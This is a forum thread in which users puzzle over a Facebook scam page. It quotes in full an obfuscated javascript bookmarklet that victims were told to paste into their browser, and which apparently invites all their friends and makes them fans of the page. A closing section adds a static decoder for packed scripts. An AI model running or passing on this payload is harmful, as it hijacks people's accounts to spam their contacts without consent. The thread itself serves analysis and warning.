Facebook fanpage attempt at running obscure protected javascript?



  •  I was on Facebook (TRWTF) and I got a message about a friend who "liked" something and recommended it to me, so I went to the page and it said:

    To view the message, Hold down Ctrl -> C

    Upon doing that it gave other instructions to press Alt -> D and paste and enter, so I checked out the code I copied to my clipboard... It contained the following:

    javascript:(function()
    {a='app4949752878_jop';b='app4949752878_jode';
    ifc='app4949752878_ifc';
    ifo='app4949752878_ifo';
    mw='app4949752878_mwrapper';eval(function(p,a,c,k,e,r)
    {e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):
    c.toString(36))};if(!''.replace(/^/,String))
    {while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function()
    {return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(
    new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}
    ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\
    h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\
    j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q
    \\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\
    v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\
    p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]]
    (V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)
    [e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]]
    (e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);
    C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]]
    (c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|
    x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|
    x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|
    x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();
     

    I am not a javascript expert but I know what eval does... I just can't figure out what exactly it's trying to do... :-/



  •  As far as I can tell, it "suggests" the page to all your friends and makes you a fan of it as well.  At least that's what happened to my friend when she did it.



  •  But why did they have to make you run it? They had a very nice Javascript animation to animate all the steps you needed to do :S



  • To make those who are curious but don't want to send the link to every single one of their friends send it anyway?



  •  So ... Can someone tell me what fanpage this is?  I don't have the patience to decrypt it or any of that bullshit.  I just want to know where to direct the Anthrax.



  • @belgariontheking said:

    not the band

     

    YEAH, RIGHT



  • This looks very similar to the packed form of jQuery's source code.



  • @toshir0 said:

    This looks very similar to the packed form of jQuery's source code.
    http://dean.edwards.name/packer/



  • @Xyro said:

    @toshir0 said:
    This looks very similar to the packed form of jQuery's source code.
    http://dean.edwards.name/packer/
    Oh, so they used some external packing tool? I didn't know, thanks for the link.



  • @toshir0 said:

    Filed under: crap maybe politeness and courtesy are sufficient griefs to be banned here
    Nah, don't interpret the terse reply as impatience or condescension, I just figured the link spoke for itself.
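
Output from the packer linked in the thread can be read without running it: the `p,a,c,k,e,r` wrapper is only a word-substitution table, and the `\xNN` strings underneath are plain hex escapes. The decoder below is an added example, not code from any poster in this thread; the function names are made up for illustration and the sample payload and word list are constructed.

```javascript
// Static decoder for Dean Edwards "packer" output. Nothing is passed to eval().

// Encode a dictionary index the way the packer's stub does:
// base-`radix` digits 0-9, a-z, then A-Z for digit values above 35.
function packerToken(n, radix) {
  const digit = n % radix;
  const head = n < radix ? '' : packerToken(Math.floor(n / radix), radix);
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Layer 1: swap each word-like token in the payload for its dictionary word.
// An empty dictionary entry means the token stands for itself.
function unpack(payload, radix, count, words) {
  const table = new Map();
  for (let i = 0; i < count; i++) {
    if (words[i]) table.set(packerToken(i, radix), words[i]);
  }
  return payload.replace(/\b\w+\b/g, (tok) => (table.has(tok) ? table.get(tok) : tok));
}

// Layer 2: turn \xNN escapes into readable characters, still as inert text.
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Constructed sample in the same shape as a packed script's arguments:
// eval(function(p,a,c,k,e,r){...}(PAYLOAD, RADIX, COUNT, WORDS, 0, {}))
const SAMPLE_PAYLOAD = '2 1=["\\3\\4"];5.6(1[0])';
const SAMPLE_RADIX = 62;
const SAMPLE_WORDS = '|_0xab|var|x68|x69|console|log'.split('|');

function analyzeSample() {
  const layer1 = unpack(SAMPLE_PAYLOAD, SAMPLE_RADIX, SAMPLE_WORDS.length, SAMPLE_WORDS);
  const layer2 = decodeHexEscapes(layer1);
  return { layer1, layer2 };
}

console.log(analyzeSample());
```

To inspect a real sample, copy the four arguments out of the trailing call as strings and numbers and pass them to `unpack`; the source text is only ever treated as data.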

